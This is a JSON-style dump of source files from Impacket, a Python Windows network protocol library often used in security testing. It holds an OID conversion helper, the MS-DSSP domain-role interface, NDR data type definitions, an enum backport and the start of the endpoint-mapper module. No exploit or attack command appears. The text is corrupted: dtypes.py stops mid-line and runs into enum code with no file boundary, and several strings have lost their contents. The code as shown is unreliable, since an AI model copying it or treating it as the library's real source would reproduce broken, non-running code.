16384:\n # mark it so that it is known to not be the whole lastValue\n lowerWord += 32768\n\n upperWord = pos\n\n attrTyp = ATTRTYP()\n attrTyp['Data'] = (upperWord << 16) + lowerWord\n return attrTyp\n\ndef OidFromAttid(prefixTable, attr):\n # separate the ATTRTYP into two parts\n upperWord = attr // 65536\n lowerWord = attr % 65536\n\n # search in the prefix table to find the upperWord, if found,\n # construct the binary OID by appending lowerWord to the end of\n # found prefix.\n\n binaryOID = None\n for j, item in enumerate(prefixTable):\n if item['ndx'] == upperWord:\n binaryOID = item['prefix']['elements'][:item['prefix']['length']]\n if lowerWord < 128:\n binaryOID.append(pack('B',lowerWord))\n else:\n if lowerWord >= 32768:\n lowerWord -= 32768\n binaryOID.append(pack('B',(((lowerWord//128) % 128)+128)))\n binaryOID.append(pack('B',(lowerWord%128)))\n break\n\n if binaryOID is None:\n return None\n return str(decoder.decode(b'\\x06' + pack('B',(len(binaryOID))) + b''.join(binaryOID), asn1Spec = univ.ObjectIdentifier())[0])\n\nif __name__ == '__main__':\n prefixTable = []\n oid0 = '1.2.840.113556.1.4.94'\n oid1 = '2.5.6.2'\n oid2 = '1.2.840.113556.1.2.1'\n oid3 = '1.2.840.113556.1.3.223'\n oid4 = '1.2.840.113556.1.5.7000.53'\n\n o0 = MakeAttid(prefixTable, oid0)\n print(hex(o0))\n o1 = MakeAttid(prefixTable, oid1)\n print(hex(o1))\n o2 = MakeAttid(prefixTable, oid2)\n print(hex(o2))\n o3 = MakeAttid(prefixTable, oid3)\n print(hex(o3))\n o4 = MakeAttid(prefixTable, oid4)\n print(hex(o4))\n jj = OidFromAttid(prefixTable, o0)\n print(jj)\n jj = OidFromAttid(prefixTable, o1)\n print(jj)\n jj = OidFromAttid(prefixTable, o2)\n print(jj)\n jj = OidFromAttid(prefixTable, o3)\n print(jj)\n jj = OidFromAttid(prefixTable, o4)\n print(jj)\n" }, { "path": "impacket/dcerpc/v5/dssp.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# [MS-DSSP] Interface implementation\n# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dssp\n#\n# Best way to learn how to use these calls is to grab the protocol standard\n# so you understand what the call does, and then read the test case located\n# at https://github.com/fortra/impacket/tree/master/tests/SMB_RPC\n#\n# Some calls have helper functions, which makes it even easier to use.\n# They are located at the end of this file.\n# Helper functions start with \"h\".\n# There are test cases for them too.\n#\n# Author:\n# Simon Decosse (@simondotsh)\n#\n\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRUNION, NDRPOINTER, NDRENUM\nfrom impacket.dcerpc.v5.dtypes import UINT, LPWSTR, GUID\nfrom impacket import system_errors\nfrom impacket.dcerpc.v5.enum import Enum\nfrom impacket.uuid import uuidtup_to_bin\n\nMSRPC_UUID_DSSP = uuidtup_to_bin(('3919286A-B10C-11D0-9BA8-00C04FD92EF5', '0.0'))\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__( self ):\n key = self.error_code\n if key in system_errors.ERROR_MESSAGES:\n error_msg_short = system_errors.ERROR_MESSAGES[key][0]\n error_msg_verbose = system_errors.ERROR_MESSAGES[key][1] \n return 'DSSP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)\n else:\n return 'DSSP SessionError: unknown error code: 0x%x' % self.error_code\n\n################################################################################\n# CONSTANTS\n################################################################################\n# 2.2.1 DSROLER_PRIMARY_DOMAIN_INFO_BASIC\nDSROLE_PRIMARY_DS_RUNNING = 0x00000001\nDSROLE_PRIMARY_DS_MIXED_MODE = 0x00000002\nDSROLE_PRIMARY_DS_READONLY = 0x00000008\nDSROLE_PRIMARY_DOMAIN_GUID_PRESENT = 0x01000000\n\n#2.2.5 DSROLE_UPGRADE_STATUS_INFO\nDSROLE_UPGRADE_IN_PROGRESS = 0x00000004\n\n################################################################################\n# STRUCTURES\n################################################################################\n#2.2.2 DSROLE_MACHINE_ROLE\nclass DSROLE_MACHINE_ROLE(NDRENUM):\n class enumItems(Enum):\n DsRole_RoleStandaloneWorkstation = 0\n DsRole_RoleMemberWorkstation = 1\n DsRole_RoleStandaloneServer = 2\n DsRole_RoleMemberServer = 3\n DsRole_RoleBackupDomainController = 4\n DsRole_RolePrimaryDomainController = 5\n \n# 2.2.1 DSROLER_PRIMARY_DOMAIN_INFO_BASIC\nclass DSROLER_PRIMARY_DOMAIN_INFO_BASIC(NDRSTRUCT):\n structure = (\n ('MachineRole', DSROLE_MACHINE_ROLE),\n ('Flags', UINT),\n ('DomainNameFlat', LPWSTR),\n ('DomainNameDns', LPWSTR),\n ('DomainForestName', LPWSTR),\n ('DomainGuid', GUID),\n )\n\nclass PDSROLER_PRIMARY_DOMAIN_INFO_BASIC(NDRPOINTER):\n referent = (\n ('Data', DSROLER_PRIMARY_DOMAIN_INFO_BASIC),\n )\n\n# 2.2.4 DSROLE_OPERATION_STATE\nclass DSROLE_OPERATION_STATE(NDRENUM):\n class enumItems(Enum):\n DsRoleOperationIdle = 0\n DsRoleOperationActive = 1\n DsRoleOperationNeedReboot = 2\n\n# 2.2.3 DSROLE_OPERATION_STATE_INFO\nclass DSROLE_OPERATION_STATE_INFO(NDRSTRUCT):\n structure = (\n ('OperationState', DSROLE_OPERATION_STATE),\n )\n\nclass PDSROLE_OPERATION_STATE_INFO(NDRPOINTER):\n referent = (\n ('Data', DSROLE_OPERATION_STATE_INFO),\n )\n\n# 2.2.6 DSROLE_SERVER_STATE\nclass DSROLE_SERVER_STATE(NDRENUM):\n class enumItems(Enum):\n DsRoleServerUnknown = 0\n DsRoleServerPrimary = 1\n DsRoleServerBackup = 2\n\nclass PDSROLE_SERVER_STATE(NDRPOINTER):\n referent = (\n ('Data', DSROLE_SERVER_STATE),\n )\n\n# 2.2.5 DSROLE_UPGRADE_STATUS_INFO\nclass DSROLE_UPGRADE_STATUS_INFO(NDRSTRUCT):\n structure = (\n ('OperationState', UINT),\n ('PreviousServerState', DSROLE_SERVER_STATE),\n )\n\nclass PDSROLE_UPGRADE_STATUS_INFO(NDRPOINTER):\n referent = (\n ('Data', DSROLE_UPGRADE_STATUS_INFO),\n )\n\n# 2.2.7 DSROLE_PRIMARY_DOMAIN_INFO_LEVEL\nclass DSROLE_PRIMARY_DOMAIN_INFO_LEVEL(NDRENUM):\n class enumItems(Enum):\n DsRolePrimaryDomainInfoBasic = 1\n DsRoleUpgradeStatus = 2\n DsRoleOperationState = 3\n\n# 2.2.8 DSROLER_PRIMARY_DOMAIN_INFORMATION\nclass DSROLER_PRIMARY_DOMAIN_INFORMATION(NDRUNION):\n commonHdr = (\n ('tag', DSROLE_PRIMARY_DOMAIN_INFO_LEVEL),\n )\n \n union = {\n DSROLE_PRIMARY_DOMAIN_INFO_LEVEL.DsRolePrimaryDomainInfoBasic : ('DomainInfoBasic', DSROLER_PRIMARY_DOMAIN_INFO_BASIC),\n DSROLE_PRIMARY_DOMAIN_INFO_LEVEL.DsRoleUpgradeStatus : ('UpgradStatusInfo', DSROLE_UPGRADE_STATUS_INFO),\n DSROLE_PRIMARY_DOMAIN_INFO_LEVEL.DsRoleOperationState : ('OperationStateInfo', DSROLE_OPERATION_STATE_INFO),\n }\n\nclass PDSROLER_PRIMARY_DOMAIN_INFORMATION(NDRPOINTER):\n referent = (\n ('Data', DSROLER_PRIMARY_DOMAIN_INFORMATION),\n )\n\n################################################################################\n# RPC CALLS\n################################################################################\n# 3.2.5.1 DsRolerGetPrimaryDomainInformation (Opnum 0)\nclass DsRolerGetPrimaryDomainInformation(NDRCALL):\n opnum = 0\n structure = (\n ('InfoLevel', DSROLE_PRIMARY_DOMAIN_INFO_LEVEL),\n )\n\nclass DsRolerGetPrimaryDomainInformationResponse(NDRCALL):\n structure = (\n ('DomainInfo', PDSROLER_PRIMARY_DOMAIN_INFORMATION),\n )\n\n################################################################################\n# OPNUMs and their corresponding structures\n################################################################################\nOPNUMS = {\n 0 : (DsRolerGetPrimaryDomainInformation, DsRolerGetPrimaryDomainInformationResponse),\n}\n\n################################################################################\n# HELPER FUNCTIONS\n################################################################################\ndef hDsRolerGetPrimaryDomainInformation(dce, infoLevel):\n request = DsRolerGetPrimaryDomainInformation()\n request['InfoLevel'] = infoLevel\n return dce.request(request)\n" }, { "path": "impacket/dcerpc/v5/dtypes.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# [MS-DTYP] Interface mini implementation\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom struct import pack, unpack\nfrom six import binary_type\n\nfrom impacket.dcerpc.v5.ndr import NDRULONG, NDRUHYPER, NDRSHORT, NDRLONG, NDRPOINTER, NDRUniConformantArray, \\\n NDRUniFixedArray, NDR, NDRHYPER, NDRSMALL, NDRPOINTERNULL, NDRSTRUCT, \\\n NDRUSMALL, NDRBOOLEAN, NDRUSHORT, NDRFLOAT, NDRDOUBLEFLOAT, NULL\nfrom impacket.structure import Structure\n\nDWORD = NDRULONG\nBOOL = NDRULONG\nUCHAR = NDRUSMALL\nSHORT = NDRSHORT\nNULL = NULL\n\nclass LPDWORD(NDRPOINTER):\n referent = (\n ('Data', DWORD),\n )\n\nclass PSHORT(NDRPOINTER):\n referent = (\n ('Data', SHORT),\n )\n\nclass PBOOL(NDRPOINTER):\n referent = (\n ('Data', BOOL),\n )\n\nclass LPBYTE(NDRPOINTER):\n referent = (\n ('Data', NDRUniConformantArray),\n )\nPBYTE = LPBYTE\n\n# 2.2.4 BOOLEAN\nBOOLEAN = NDRBOOLEAN\n\n# 2.2.6 BYTE\nBYTE = NDRUSMALL\n\n# 2.2.7 CHAR\nCHAR = NDRSMALL\nclass PCHAR(NDRPOINTER):\n referent = (\n ('Data', CHAR),\n )\n\nclass WIDESTR(NDRUniFixedArray):\n def getDataLen(self, data, offset=0):\n return data.find(b'\\x00\\x00\\x00', offset)+3-offset\n\n def __setitem__(self, key, value):\n if key == 'Data':\n try:\n self.fields[key] = value.encode('utf-16le')\n except UnicodeDecodeError:\n import sys\n self.fields[key] = value.decode(sys.getfilesystemencoding()).encode('utf-16le')\n\n self.data = None # force recompute\n else:\n return NDR.__setitem__(self, key, value)\n\n def __getitem__(self, key):\n if key == 'Data':\n return self.fields[key].decode('utf-16le')\n else:\n return NDR.__getitem__(self,key)\n\nclass STR(NDRSTRUCT):\n commonHdr = (\n ('MaximumCount', ' 4)\n\n\ndef _is_sunder(name):\n \"\"\"Returns True if a _sunder_ name, False otherwise.\"\"\"\n return (name[0] == name[-1] == '_' and \n name[1:2] != '_' and\n name[-2:-1] != '_' and\n len(name) > 2)\n\n\ndef _make_class_unpicklable(cls):\n \"\"\"Make the given class un-picklable.\"\"\"\n def _break_on_call_reduce(self):\n raise TypeError('%r cannot be pickled' % self)\n cls.__reduce__ = _break_on_call_reduce\n cls.__module__ = ''\n\n\nclass _EnumDict(dict):\n \"\"\"Track enum member order and ensure member names are not reused.\n\n EnumMeta will use the names found in self._member_names as the\n enumeration member names.\n\n \"\"\"\n def __init__(self):\n super(_EnumDict, self).__init__()\n self._member_names = []\n\n def __setitem__(self, key, value):\n \"\"\"Changes anything not dundered or not a descriptor.\n\n If a descriptor is added with the same name as an enum member, the name\n is removed from _member_names (this may leave a hole in the numerical\n sequence of values).\n\n If an enum member name is used twice, an error is raised; duplicate\n values are not checked for.\n\n Single underscore (sunder) names are reserved.\n\n Note: in 3.x __order__ is simply discarded as a not necessary piece\n leftover from 2.x\n\n \"\"\"\n if pyver >= 3.0 and key == '__order__':\n return\n if _is_sunder(key):\n raise ValueError('_names_ are reserved for future Enum use')\n elif _is_dunder(key):\n pass\n elif key in self._member_names:\n # descriptor overwriting an enum?\n raise TypeError('Attempted to reuse key: %r' % key)\n elif not _is_descriptor(value):\n if key in self:\n # enum overwriting a descriptor?\n raise TypeError('Key already defined as: %r' % self[key])\n self._member_names.append(key)\n super(_EnumDict, self).__setitem__(key, value)\n\n\n# Dummy value for Enum as EnumMeta explicitly checks for it, but of course until\n# EnumMeta finishes running the first time the Enum class doesn't exist. This\n# is also why there are checks in EnumMeta like `if Enum is not None`\nEnum = None\n\n\nclass EnumMeta(type):\n \"\"\"Metaclass for Enum\"\"\"\n @classmethod\n def __prepare__(metacls, cls, bases):\n return _EnumDict()\n\n def __new__(metacls, cls, bases, classdict):\n # an Enum class is final once enumeration items have been defined; it\n # cannot be mixed with other types (int, float, etc.) if it has an\n # inherited __new__ unless a new __new__ is defined (or the resulting\n # class will fail).\n if type(classdict) is dict:\n original_dict = classdict\n classdict = _EnumDict()\n for k, v in original_dict.items():\n classdict[k] = v\n\n member_type, first_enum = metacls._get_mixins_(bases)\n #if member_type is object:\n # use_args = False\n #else:\n # use_args = True\n __new__, save_new, use_args = metacls._find_new_(classdict, member_type,\n first_enum)\n # save enum items into separate mapping so they don't get baked into\n # the new class\n members = dict((k, classdict[k]) for k in classdict._member_names)\n for name in classdict._member_names:\n del classdict[name]\n\n # py2 support for definition order\n __order__ = classdict.get('__order__')\n if __order__ is None:\n __order__ = classdict._member_names\n if pyver < 3.0:\n order_specified = False\n else:\n order_specified = True\n else:\n del classdict['__order__']\n order_specified = True\n if pyver < 3.0:\n __order__ = __order__.replace(',', ' ').split()\n aliases = [name for name in members if name not in __order__]\n __order__ += aliases\n\n # check for illegal enum names (any others?)\n invalid_names = set(members) & set(['mro'])\n if invalid_names:\n raise ValueError('Invalid enum member name(s): %s' % (\n ', '.join(invalid_names), ))\n\n # create our new Enum type\n enum_class = super(EnumMeta, metacls).__new__(metacls, cls, bases, classdict)\n enum_class._member_names_ = [] # names in random order\n enum_class._member_map_ = {} # name->value map\n enum_class._member_type_ = member_type\n\n # Reverse value->name map for hashable values.\n enum_class._value2member_map_ = {}\n\n # check for a __getnewargs__, and if not present sabotage\n # pickling, since it won't work anyway\n if (member_type is not object and\n member_type.__dict__.get('__getnewargs__') is None\n ):\n _make_class_unpicklable(enum_class)\n\n # instantiate them, checking for duplicates as we go\n # we instantiate first instead of checking for duplicates first in case\n # a custom __new__ is doing something funky with the values -- such as\n # auto-numbering ;)\n if __new__ is None:\n __new__ = enum_class.__new__\n for member_name in __order__:\n value = members[member_name]\n if not isinstance(value, tuple):\n args = (value, )\n else:\n args = value\n if member_type is tuple: # special case for tuple enums\n args = (args, ) # wrap it one more time\n if not use_args or not args:\n enum_member = __new__(enum_class)\n if not hasattr(enum_member, '_value_'):\n enum_member._value_ = value\n else:\n enum_member = __new__(enum_class, *args)\n if not hasattr(enum_member, '_value_'):\n enum_member._value_ = member_type(*args)\n value = enum_member._value_\n enum_member._name_ = member_name\n enum_member.__objclass__ = enum_class\n enum_member.__init__(*args)\n # If another member with the same value was already defined, the\n # new member becomes an alias to the existing one.\n for name, canonical_member in enum_class._member_map_.items():\n if canonical_member.value == enum_member._value_:\n enum_member = canonical_member\n break\n else:\n # Aliases don't appear in member names (only in __members__).\n enum_class._member_names_.append(member_name)\n enum_class._member_map_[member_name] = enum_member\n try:\n # This may fail if value is not hashable. We can't add the value\n # to the map, and by-value lookups for this value will be\n # linear.\n enum_class._value2member_map_[value] = enum_member\n except TypeError:\n pass\n\n # in Python2.x we cannot know definition order, so go with value order\n # unless __order__ was specified in the class definition\n if not order_specified:\n enum_class._member_names_ = [\n e[0] for e in sorted(\n [(name, enum_class._member_map_[name]) for name in enum_class._member_names_],\n key=lambda t: t[1]._value_\n )]\n\n # double check that repr and friends are not the mixin's or various\n # things break (such as pickle)\n if Enum is not None:\n setattr(enum_class, '__getnewargs__', Enum.__getnewargs__)\n for name in ('__repr__', '__str__', '__format__'):\n class_method = getattr(enum_class, name)\n obj_method = getattr(member_type, name, None)\n enum_method = getattr(first_enum, name, None)\n if obj_method is not None and obj_method is class_method:\n setattr(enum_class, name, enum_method)\n\n # method resolution and int's are not playing nice\n # Python's less than 2.6 use __cmp__\n\n if pyver < 2.6:\n\n if issubclass(enum_class, int):\n setattr(enum_class, '__cmp__', getattr(int, '__cmp__'))\n\n elif pyver < 3.0:\n\n if issubclass(enum_class, int):\n for method in (\n '__le__',\n '__lt__',\n '__gt__',\n '__ge__',\n '__eq__',\n '__ne__',\n '__hash__',\n ):\n setattr(enum_class, method, getattr(int, method))\n\n # replace any other __new__ with our own (as long as Enum is not None,\n # anyway) -- again, this is to support pickle\n if Enum is not None:\n # if the user defined their own __new__, save it before it gets\n # clobbered in case they subclass later\n if save_new:\n setattr(enum_class, '__member_new__', enum_class.__dict__['__new__'])\n setattr(enum_class, '__new__', Enum.__dict__['__new__'])\n return enum_class\n\n def __call__(cls, value, names=None, module=None, type=None):\n \"\"\"Either returns an existing member, or creates a new enum class.\n\n This method is used both when an enum class is given a value to match\n to an enumeration member (i.e. Color(3)) and for the functional API\n (i.e. Color = Enum('Color', names='red green blue')).\n\n When used for the functional API: `module`, if set, will be stored in\n the new class' __module__ attribute; `type`, if set, will be mixed in\n as the first base class.\n\n Note: if `module` is not set this routine will attempt to discover the\n calling module by walking the frame stack; if this is unsuccessful\n the resulting class will not be pickleable.\n\n \"\"\"\n if names is None: # simple value lookup\n return cls.__new__(cls, value)\n # otherwise, functional API: we're creating a new Enum type\n return cls._create_(value, names, module=module, type=type)\n\n def __contains__(cls, member):\n return isinstance(member, cls) and member.name in cls._member_map_\n\n def __delattr__(cls, attr):\n # nicer error message when someone tries to delete an attribute\n # (see issue19025).\n if attr in cls._member_map_:\n raise AttributeError(\n \"%s: cannot delete Enum member.\" % cls.__name__)\n super(EnumMeta, cls).__delattr__(attr)\n\n def __dir__(self):\n return (['__class__', '__doc__', '__members__', '__module__'] +\n self._member_names_)\n\n @property\n def __members__(cls):\n \"\"\"Returns a mapping of member name->value.\n\n This mapping lists all enum members, including aliases. Note that this\n is a copy of the internal mapping.\n\n \"\"\"\n return cls._member_map_.copy()\n\n def __getattr__(cls, name):\n \"\"\"Return the enum member matching `name`\n\n We use __getattr__ instead of descriptors or inserting into the enum\n class' __dict__ in order to support `name` and `value` being both\n properties for enum members (which live in the class' __dict__) and\n enum members themselves.\n\n \"\"\"\n if _is_dunder(name):\n raise AttributeError(name)\n try:\n return cls._member_map_[name]\n except KeyError:\n raise AttributeError(name)\n\n def __getitem__(cls, name):\n return cls._member_map_[name]\n\n def __iter__(cls):\n return (cls._member_map_[name] for name in cls._member_names_)\n\n def __reversed__(cls):\n return (cls._member_map_[name] for name in reversed(cls._member_names_))\n\n def __len__(cls):\n return len(cls._member_names_)\n\n def __repr__(cls):\n return \"\" % cls.__name__\n\n def __setattr__(cls, name, value):\n \"\"\"Block attempts to reassign Enum members.\n\n A simple assignment to the class namespace only changes one of the\n several possible ways to get an Enum member from the Enum class,\n resulting in an inconsistent Enumeration.\n\n \"\"\"\n member_map = cls.__dict__.get('_member_map_', {})\n if name in member_map:\n raise AttributeError('Cannot reassign members.')\n super(EnumMeta, cls).__setattr__(name, value)\n\n def _create_(cls, class_name, names=None, module=None, type=None):\n \"\"\"Convenience method to create a new Enum class.\n\n `names` can be:\n\n * A string containing member names, separated either with spaces or\n commas. Values are auto-numbered from 1.\n * An iterable of member names. Values are auto-numbered from 1.\n * An iterable of (member name, value) pairs.\n * A mapping of member name -> value.\n\n \"\"\"\n metacls = cls.__class__\n if type is None:\n bases = (cls, )\n else:\n bases = (type, cls)\n classdict = metacls.__prepare__(class_name, bases)\n __order__ = []\n\n # special processing needed for names?\n if isinstance(names, str):\n names = names.replace(',', ' ').split()\n if isinstance(names, (tuple, list)) and isinstance(names[0], str):\n names = [(e, i+1) for (i, e) in enumerate(names)]\n\n # Here, names is either an iterable of (name, value) or a mapping.\n for item in names:\n if isinstance(item, str):\n member_name, member_value = item, names[item]\n else:\n member_name, member_value = item\n classdict[member_name] = member_value\n __order__.append(member_name)\n # only set __order__ in classdict if name/value was not from a mapping\n if not isinstance(item, str):\n classdict['__order__'] = ' '.join(__order__)\n enum_class = metacls.__new__(metacls, class_name, bases, classdict)\n\n # TODO: replace the frame hack if a blessed way to know the calling\n # module is ever developed\n if module is None:\n try:\n module = _sys._getframe(2).f_globals['__name__']\n except (AttributeError, ValueError):\n pass\n if module is None:\n _make_class_unpicklable(enum_class)\n else:\n enum_class.__module__ = module\n\n return enum_class\n\n @staticmethod\n def _get_mixins_(bases):\n \"\"\"Returns the type for creating enum members, and the first inherited\n enum class.\n\n bases: the tuple of bases that was given to __new__\n\n \"\"\"\n if not bases or Enum is None:\n return object, Enum\n \n\n # double check that we are not subclassing a class with existing\n # enumeration members; while we're at it, see if any other data\n # type has been mixed in so we can use the correct __new__\n member_type = first_enum = None\n for base in bases:\n if (base is not Enum and\n issubclass(base, Enum) and\n base._member_names_):\n raise TypeError(\"Cannot extend enumerations\")\n # base is now the last base in bases\n if not issubclass(base, Enum):\n raise TypeError(\"new enumerations must be created as \"\n \"`ClassName([mixin_type,] enum_type)`\")\n\n # get correct mix-in type (either mix-in type of Enum subclass, or\n # first base if last base is Enum)\n if not issubclass(bases[0], Enum):\n member_type = bases[0] # first data type\n first_enum = bases[-1] # enum type\n else:\n for base in bases[0].__mro__:\n # most common: (IntEnum, int, Enum, object)\n # possible: (, ,\n # , ,\n # )\n if issubclass(base, Enum):\n if first_enum is None:\n first_enum = base\n else:\n if member_type is None:\n member_type = base\n\n return member_type, first_enum\n\n if pyver < 3.0:\n @staticmethod\n def _find_new_(classdict, member_type, first_enum):\n \"\"\"Returns the __new__ to be used for creating the enum members.\n\n classdict: the class dictionary given to __new__\n member_type: the data type whose __new__ will be used by default\n first_enum: enumeration to check for an overriding __new__\n\n \"\"\"\n # now find the correct __new__, checking to see of one was defined\n # by the user; also check earlier enum classes in case a __new__ was\n # saved as __member_new__\n __new__ = classdict.get('__new__', None)\n if __new__:\n return None, True, True # __new__, save_new, use_args\n\n N__new__ = getattr(None, '__new__')\n O__new__ = getattr(object, '__new__')\n if Enum is None:\n E__new__ = N__new__\n else:\n E__new__ = Enum.__dict__['__new__']\n # check all possibles for __member_new__ before falling back to\n # __new__\n for method in ('__member_new__', '__new__'):\n for possible in (member_type, first_enum):\n try:\n target = possible.__dict__[method]\n except (AttributeError, KeyError):\n target = getattr(possible, method, None)\n if target not in [\n None,\n N__new__,\n O__new__,\n E__new__,\n ]:\n if method == '__member_new__':\n classdict['__new__'] = target\n return None, False, True\n if isinstance(target, staticmethod):\n target = target.__get__(member_type)\n __new__ = target\n break\n if __new__ is not None:\n break\n else:\n __new__ = object.__new__\n\n # if a non-object.__new__ is used then whatever value/tuple was\n # assigned to the enum member name will be passed to __new__ and to the\n # new enum member's __init__\n if __new__ is object.__new__:\n use_args = False\n else:\n use_args = True\n\n return __new__, False, use_args\n else:\n @staticmethod\n def _find_new_(classdict, member_type, first_enum):\n \"\"\"Returns the __new__ to be used for creating the enum members.\n\n classdict: the class dictionary given to __new__\n member_type: the data type whose __new__ will be used by default\n first_enum: enumeration to check for an overriding __new__\n\n \"\"\"\n # now find the correct __new__, checking to see of one was defined\n # by the user; also check earlier enum classes in case a __new__ was\n # saved as __member_new__\n __new__ = classdict.get('__new__', None)\n\n # should __new__ be saved as __member_new__ later?\n save_new = __new__ is not None\n\n if __new__ is None:\n # check all possibles for __member_new__ before falling back to\n # __new__\n for method in ('__member_new__', '__new__'):\n for possible in (member_type, first_enum):\n target = getattr(possible, method, None)\n if target not in (\n None,\n None.__new__,\n object.__new__,\n Enum.__new__,\n ):\n __new__ = target\n break\n if __new__ is not None:\n break\n else:\n __new__ = object.__new__\n\n # if a non-object.__new__ is used then whatever value/tuple was\n # assigned to the enum member name will be passed to __new__ and to the\n # new enum member's __init__\n if __new__ is object.__new__:\n use_args = False\n else:\n use_args = True\n\n return __new__, save_new, use_args\n\n\n########################################################\n# In order to support Python 2 and 3 with a single\n# codebase we have to create the Enum methods separately\n# and then use the `type(name, bases, dict)` method to\n# create the class.\n########################################################\ntemp_enum_dict = {}\ntemp_enum_dict['__doc__'] = \"Generic enumeration.\\n\\n Derive from this class to define new enumerations.\\n\\n\"\n\ndef __new__(cls, value):\n # all enum instances are actually created during class construction\n # without calling this method; this method is called by the metaclass'\n # __call__ (i.e. Color(3) ), and by pickle\n if type(value) is cls:\n # For lookups like Color(Color.red)\n value = value.value\n #return value\n # by-value search for a matching enum member\n # see if it's in the reverse mapping (for hashable values)\n try:\n if value in cls._value2member_map_:\n return cls._value2member_map_[value]\n except TypeError:\n # not there, now do long search -- O(n) behavior\n for member in cls._member_map_.values():\n if member.value == value:\n return member\n raise ValueError(\"%s is not a valid %s\" % (value, cls.__name__))\ntemp_enum_dict['__new__'] = __new__\ndel __new__\n\ndef __repr__(self):\n return \"<%s.%s: %r>\" % (\n self.__class__.__name__, self._name_, self._value_)\ntemp_enum_dict['__repr__'] = __repr__\ndel __repr__\n\ndef __str__(self):\n return \"%s.%s\" % (self.__class__.__name__, self._name_)\ntemp_enum_dict['__str__'] = __str__\ndel __str__\n\ndef __dir__(self):\n added_behavior = [m for m in self.__class__.__dict__ if m[0] != '_']\n return (['__class__', '__doc__', '__module__', 'name', 'value'] + added_behavior)\ntemp_enum_dict['__dir__'] = __dir__\ndel __dir__\n\ndef __format__(self, format_spec):\n # mixed-in Enums should use the mixed-in type's __format__, otherwise\n # we can get strange results with the Enum name showing up instead of\n # the value\n\n # pure Enum branch\n if self._member_type_ is object:\n cls = str\n val = str(self)\n # mix-in branch\n else:\n cls = self._member_type_\n val = self.value\n return cls.__format__(val, format_spec)\ntemp_enum_dict['__format__'] = __format__\ndel __format__\n\n\n####################################\n# Python's less than 2.6 use __cmp__\n\nif pyver < 2.6:\n\n def __cmp__(self, other):\n if type(other) is self.__class__:\n if self is other:\n return 0\n return -1\n return NotImplemented\n raise TypeError(\"unorderable types: %s() and %s()\" % (self.__class__.__name__, other.__class__.__name__))\n temp_enum_dict['__cmp__'] = __cmp__\n del __cmp__\n\nelse:\n\n def __le__(self, other):\n raise TypeError(\"unorderable types: %s() <= %s()\" % (self.__class__.__name__, other.__class__.__name__))\n temp_enum_dict['__le__'] = __le__\n del __le__\n\n def __lt__(self, other):\n raise TypeError(\"unorderable types: %s() < %s()\" % (self.__class__.__name__, other.__class__.__name__))\n temp_enum_dict['__lt__'] = __lt__\n del __lt__\n\n def __ge__(self, other):\n raise TypeError(\"unorderable types: %s() >= %s()\" % (self.__class__.__name__, other.__class__.__name__))\n temp_enum_dict['__ge__'] = __ge__\n del __ge__\n\n def __gt__(self, other):\n raise TypeError(\"unorderable types: %s() > %s()\" % (self.__class__.__name__, other.__class__.__name__))\n temp_enum_dict['__gt__'] = __gt__\n del __gt__\n \n\ndef __eq__(self, other):\n if type(other) is self.__class__:\n return self is other\n return NotImplemented\ntemp_enum_dict['__eq__'] = __eq__\ndel __eq__\n\ndef __ne__(self, other):\n if type(other) is self.__class__:\n return self is not other\n return NotImplemented\ntemp_enum_dict['__ne__'] = __ne__\ndel __ne__\n\ndef __getnewargs__(self):\n return (self._value_, )\ntemp_enum_dict['__getnewargs__'] = __getnewargs__\ndel __getnewargs__\n\ndef __hash__(self):\n return hash(self._name_)\ntemp_enum_dict['__hash__'] = __hash__\ndel __hash__\n\n# _RouteClassAttributeToGetattr is used to provide access to the `name`\n# and `value` properties of enum members while keeping some measure of\n# protection from modification, while still allowing for an enumeration\n# to have members named `name` and `value`. This works because enumeration\n# members are not set directly on the enum class -- __getattr__ is\n# used to look them up.\n\n@_RouteClassAttributeToGetattr\ndef name(self):\n return self._name_\ntemp_enum_dict['name'] = name\ndel name\n\n@_RouteClassAttributeToGetattr\ndef value(self):\n return self._value_\ntemp_enum_dict['value'] = value\ndel value\n\nEnum = EnumMeta('Enum', (object, ), temp_enum_dict)\ndel temp_enum_dict\n\n# Enum has now been created\n###########################\n\nclass IntEnum(int, Enum):\n \"\"\"Enum where members are also (and must be) ints\"\"\"\n\n\ndef unique(enumeration):\n \"\"\"Class decorator that ensures only unique members exist in an enumeration.\"\"\"\n duplicates = []\n for name, member in enumeration.__members__.items():\n if name != member.name:\n duplicates.append((name, member.name))\n if duplicates:\n duplicate_names = ', '.join(\n [\"%s -> %s\" % (alias, name) for (alias, name) in duplicates]\n )\n raise ValueError('duplicate names found in %r: %s' %\n (enumeration, duplicate_names)\n )\n return enumeration\n" }, { "path": "impacket/dcerpc/v5/epm.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# [MS-RPCE]-C706 Interface implementation for the remote portmapper\n#\n# Best way to learn how to use these calls is to grab the protocol standard\n# so you understand what the call does, and then read the test case located\n# at https://github.com/fortra/impacket/tree/master/tests/SMB_RPC\n#\n# Some calls have helper functions, which makes it even easier to use.\n# They are located at the end of this file.\n# Helper functions start with \"h\".\n# There are test cases for them too.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\nimport socket\nfrom struct import unpack\nfrom six import b\n\nfrom impacket.uuid import uuidtup_to_bin, bin_to_string\nfrom impacket.dcerpc.v5 import transport\nfrom impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantVaryingArray, 